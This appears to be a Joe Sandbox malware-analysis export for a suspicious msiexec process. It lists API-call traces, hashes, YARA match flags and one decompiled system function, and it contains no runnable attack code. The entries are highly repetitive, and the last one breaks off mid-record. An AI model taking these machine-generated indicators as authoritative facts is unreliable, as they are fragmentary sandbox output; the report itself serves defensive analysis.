                                                                  • Opcode Fuzzy Hash: 27a0d2e490c4a32b142170ce0af58cbeab771d6cf10b9e9e436b234a07047c1a
                                                                  • Instruction Fuzzy Hash: EC71A6B1D006196ADB60DBA4DC41FEEB7BAAF44304F10455DF61863241EB716B44CFB9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • NtReadFile.NTDLL(006376A0,00632B68,FFFFFFFF,0063718A,00000002,?,006376A0,00000002,0063718A,FFFFFFFF,00632B68,006376A0,00000002,00000000), ref: 0063C855
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_620000_msiexec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FileRead
                                                                  • String ID:
                                                                  • API String ID: 2738559852-0
                                                                  • Opcode ID: 28d66cf399481c95d32e110020bd23f1ef981db234855bc5189d8a5f907248b6
                                                                  • Instruction ID: 62430bec79222bf9349d0a7138b34b06eb5d2aed0434f732d3b0a64c207ab6d4
                                                                  • Opcode Fuzzy Hash: 28d66cf399481c95d32e110020bd23f1ef981db234855bc5189d8a5f907248b6
                                                                  • Instruction Fuzzy Hash: 1EF092B2200108AFCB14DF99DC85EEB7BADEF8D754F158249FA0DA7241D670E911CBA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • NtCreateFile.NTDLL(00000060,00000000,?,006374DC,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,006374DC,?,00000000,00000060,00000000,00000000), ref: 0063C7AD
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_620000_msiexec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID:
                                                                  • API String ID: 823142352-0
                                                                  • Opcode ID: 0e100477f5381d3d7289312ef97c1911a17bc4e8064b3a3f2b56bd156d4f763d
                                                                  • Instruction ID: f7bbd56edcac523265bcb475cc0d6b86d258ec87007f6382198f2ca37242a88a
                                                                  • Opcode Fuzzy Hash: 0e100477f5381d3d7289312ef97c1911a17bc4e8064b3a3f2b56bd156d4f763d
                                                                  • Instruction Fuzzy Hash: 4BF06DB2215208ABCB48DF89DC85EEB77ADAF8C754F158248BA0997241D630E8518BA5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • NtCreateFile.NTDLL(00000060,00000000,?,006374DC,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,006374DC,?,00000000,00000060,00000000,00000000), ref: 0063C7AD
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_620000_msiexec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID:
                                                                  • API String ID: 823142352-0
                                                                  • Opcode ID: 0b2f63bc4df748dc29e0f4ed07ba210983120f05ced169b3209592cb89a30aa2
                                                                  • Instruction ID: 6da1a0e6615c75e00aeb2056c49e4e20f5deb3593fdf0fba77419d0818b03337
                                                                  • Opcode Fuzzy Hash: 0b2f63bc4df748dc29e0f4ed07ba210983120f05ced169b3209592cb89a30aa2
                                                                  • Instruction Fuzzy Hash: 7E01CFB2201148AFDB48CF98DC88EEB37A9AF8C754F058248FA4D97241C630EC51CBA4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • NtReadFile.NTDLL(006376A0,00632B68,FFFFFFFF,0063718A,00000002,?,006376A0,00000002,0063718A,FFFFFFFF,00632B68,006376A0,00000002,00000000), ref: 0063C855
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_620000_msiexec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FileRead
                                                                  • String ID:
                                                                  • API String ID: 2738559852-0
                                                                  • Opcode ID: 844797972357584b4267d2b4ccdf650626f96eee6e100a2b7eb001bcc7868e0e
                                                                  • Instruction ID: b08336bab3f6f6c0ee2801826a91806784f382542e3f02477291e0d0cb456811
                                                                  • Opcode Fuzzy Hash: 844797972357584b4267d2b4ccdf650626f96eee6e100a2b7eb001bcc7868e0e
                                                                  • Instruction Fuzzy Hash: 7CF0AFB2200208ABCB14DF99DC85EEB77ADAF8C754F118248BA0DA7241D630E8118BA5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • NtDeleteFile.NTDLL(006374A2,00000002,?,006374A2,00000000,00000018,?,?,F162D13C,00000000,?), ref: 0063C885
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_620000_msiexec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: DeleteFile
                                                                  • String ID:
                                                                  • API String ID: 4033686569-0
                                                                  • Opcode ID: f2746e53b7bf35a674d76d7889673f54a58e4d5bd5b298cf89611835699b074e
                                                                  • Instruction ID: 3b2b913568af2d6021908bb483ae3edcec6d532cd30265c047848b198acc3e1a
                                                                  • Opcode Fuzzy Hash: f2746e53b7bf35a674d76d7889673f54a58e4d5bd5b298cf89611835699b074e
                                                                  • Instruction Fuzzy Hash: 57E08CB16003146BD710EF98DC8AEC73BA8DF48710F004469BA1D9B242DA74E9108BE1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • NtDeleteFile.NTDLL(006374A2,00000002,?,006374A2,00000000,00000018,?,?,F162D13C,00000000,?), ref: 0063C885
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_620000_msiexec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: DeleteFile
                                                                  • String ID:
                                                                  • API String ID: 4033686569-0
                                                                  • Opcode ID: 9cdb9952ef2d184753929ab23e7c45e026e579668fdbcbf3541df72b633117aa
                                                                  • Instruction ID: 56af5ac7e93653cd82788cfa0cb337b0e18fe770882b94fe7c036ad384823fc2
                                                                  • Opcode Fuzzy Hash: 9cdb9952ef2d184753929ab23e7c45e026e579668fdbcbf3541df72b633117aa
                                                                  • Instruction Fuzzy Hash: E5D017722402186BD610EB98DC89ED77BACDF49B60F018455BA1D5B242C670FA108BE1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • NtClose.NTDLL(0062E515,00000000,?,0062E515,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0063C8B5
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_620000_msiexec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Close
                                                                  • String ID:
                                                                  • API String ID: 3535843008-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • NtClose.NTDLL(0062E515,00000000,?,0062E515,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0063C8B5
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_620000_msiexec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Close
                                                                  • String ID:
                                                                  • API String ID: 3535843008-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.513198532.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                  • Associated: 00000004.00000002.513198532.000000000460B000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.513198532.000000000460F000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_44f0000_msiexec.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.513198532.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                  • Associated: 00000004.00000002.513198532.000000000460B000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.513198532.000000000460F000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_44f0000_msiexec.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.513198532.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                  • Associated: 00000004.00000002.513198532.000000000460B000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.513198532.000000000460F000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_44f0000_msiexec.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.513198532.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                  • Associated: 00000004.00000002.513198532.000000000460B000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.513198532.000000000460F000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_44f0000_msiexec.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.513198532.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                  • Associated: 00000004.00000002.513198532.000000000460B000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.513198532.000000000460F000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_44f0000_msiexec.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.513198532.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                  • Associated: 00000004.00000002.513198532.000000000460B000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.513198532.000000000460F000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_44f0000_msiexec.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.513198532.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                  • Associated: 00000004.00000002.513198532.000000000460B000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.513198532.000000000460F000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_44f0000_msiexec.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.513198532.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                  • Associated: 00000004.00000002.513198532.000000000460B000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.513198532.000000000460F000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_44f0000_msiexec.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.513198532.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                  • Associated: 00000004.00000002.513198532.000000000460B000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.513198532.000000000460F000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_44f0000_msiexec.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.513198532.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                  • Associated: 00000004.00000002.513198532.000000000460B000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.513198532.000000000460F000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_44f0000_msiexec.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.513198532.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                  • Associated: 00000004.00000002.513198532.000000000460B000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.513198532.000000000460F000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_44f0000_msiexec.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.513198532.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                  • Associated: 00000004.00000002.513198532.000000000460B000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.513198532.000000000460F000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_44f0000_msiexec.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.513198532.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                  • Associated: 00000004.00000002.513198532.000000000460B000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.513198532.000000000460F000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_44f0000_msiexec.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,b,0062E0E2,?,00000000,?,?), ref: 0063CC00
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_620000_msiexec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LookupPrivilegeValue
                                                                  • String ID: ~"cT$b
                                                                  • API String ID: 3899507212-1155981839
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_620000_msiexec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Sleep
                                                                  • String ID: net.dll$wininet.dll
                                                                  • API String ID: 3472027048-1269752229
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_620000_msiexec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Sleep
                                                                  • String ID: net.dll$wininet.dll
                                                                  • API String ID: 3472027048-1269752229
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetFileAttributesW.KERNEL32(?), ref: 0062FDC3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_620000_msiexec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AttributesFile
                                                                  • String ID: @
                                                                  • API String ID: 3188754299-2766056989
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • CreateThread.KERNEL32(00000000,00000000,-00000002,lZB,00000000,00000000,0062DDA2,?,?,?,425AE56C,?), ref: 0063B632
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_620000_msiexec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateThread
                                                                  • String ID: lZB
                                                                  • API String ID: 2422867632-878811233
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetFileAttributesW.KERNEL32(2Bc,?,?,00634232,00000000,?), ref: 0062E7BA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_620000_msiexec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AttributesFile
                                                                  • String ID: 2Bc
                                                                  • API String ID: 3188754299-3462067593
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • CreateThread.KERNEL32(00000000,00000000,-00000002,lZB,00000000,00000000,0062DDA2,?,?,?,425AE56C,?), ref: 0063B632
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_620000_msiexec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateThread
                                                                  • String ID: lZB
                                                                  • API String ID: 2422867632-878811233
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetFileAttributesW.KERNEL32(2Bc,?,?,00634232,00000000,?), ref: 0062E7BA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_620000_msiexec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AttributesFile
                                                                  • String ID: 2Bc
                                                                  • API String ID: 3188754299-3462067593
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,b,0062E0E2,?,00000000,?,?), ref: 0063CC00
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_620000_msiexec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LookupPrivilegeValue
                                                                  • String ID: b
                                                                  • API String ID: 3899507212-3649461319
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • CoInitialize.OLE32(00000000,00000000,?,00000000), ref: 00635237
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_620000_msiexec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Initialize
                                                                  • String ID: @J7<
                                                                  • API String ID: 2538663250-2016760708
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • CoInitialize.OLE32(00000000,00000000,?,00000000), ref: 00635237
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_620000_msiexec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Initialize
                                                                  • String ID: @J7<
                                                                  • API String ID: 2538663250-2016760708
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0062B1D2
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_620000_msiexec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Load
                                                                  • String ID:
                                                                  • API String ID: 2234796835-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,F162D13C,00000000,?), ref: 0063CA9D
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_620000_msiexec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FreeHeap
                                                                  • String ID:
                                                                  • API String ID: 3298025750-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(00008003,?,?,00628D9A,?), ref: 0062E5C1
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_620000_msiexec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorMode
                                                                  • String ID:
                                                                  • API String ID: 2340568224-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(00008003,?,?,00628D9A,?), ref: 0062E5C1
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_620000_msiexec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorMode
                                                                  • String ID:
                                                                  • API String ID: 2340568224-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,F162D13C,00000000,?), ref: 0063CA9D
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_620000_msiexec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FreeHeap
                                                                  • String ID:
                                                                  • API String ID: 3298025750-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.513198532.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                  • Associated: 00000004.00000002.513198532.000000000460B000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.513198532.000000000460F000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_44f0000_msiexec.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 53%
                                                                  			E045AFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                  				void* _t7;
                                                                  				intOrPtr _t9;
                                                                  				intOrPtr _t10;
                                                                  				intOrPtr* _t12;
                                                                  				intOrPtr* _t13;
                                                                  				intOrPtr _t14;
                                                                  				intOrPtr* _t15;
                                                                  
                                                                  				_t13 = __edx;
                                                                  				_push(_a4);
                                                                  				_t14 =  *[fs:0x18];
                                                                  				_t15 = _t12;
                                                                  				_t7 = E0455CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                  				_push(_t13);
                                                                  				E045A5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                  				_t9 =  *_t15;
                                                                  				if(_t9 == 0xffffffff) {
                                                                  					_t10 = 0;
                                                                  				} else {
                                                                  					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                  				}
                                                                  				_push(_t10);
                                                                  				_push(_t15);
                                                                  				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                  				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                  				return E045A5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                  			}











                                                                  APIs
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 045AFDFA
                                                                  Strings
                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 045AFE2B
                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 045AFE01
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.513198532.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                  • Associated: 00000004.00000002.513198532.000000000460B000.00000040.00001000.00020000.00000000.sdmp
